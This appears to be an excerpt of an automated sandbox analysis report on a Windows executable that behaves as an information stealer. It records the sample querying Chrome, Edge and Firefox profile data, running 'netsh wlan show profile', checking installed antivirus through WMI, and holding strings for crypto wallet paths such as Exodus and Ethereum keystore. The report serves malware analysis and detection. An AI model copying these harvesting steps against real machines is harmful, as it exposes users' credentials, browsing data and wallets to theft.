              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Code function: 0_2_00007FF78DA5D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF78DA5D080
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Code function: 0_2_00007FF78DA75EEC _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 0_2_00007FF78DA75EEC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe Code function: 70_2_00007FF6AA1C48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW, 70_2_00007FF6AA1C48CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara match File source: 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000003.2395753264.000001F12B202000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000003.2396649299.000001F12B202000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.2028897385.000001A5F3614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000003.2395270624.000001F12B657000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.2028897385.000001A5F3616000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000002.2400386354.000001F12B208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: 9g9LZNE4bH.exe PID: 6176, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: 9g9LZNE4bH.exe PID: 5860, type: MEMORYSTR
              Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI61762\rarreg.key, type: DROPPED
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Electrum
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxxz
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404785095.000001F12C004000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404785095.000001F12C004000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Exodusz
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404785095.000001F12C004000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
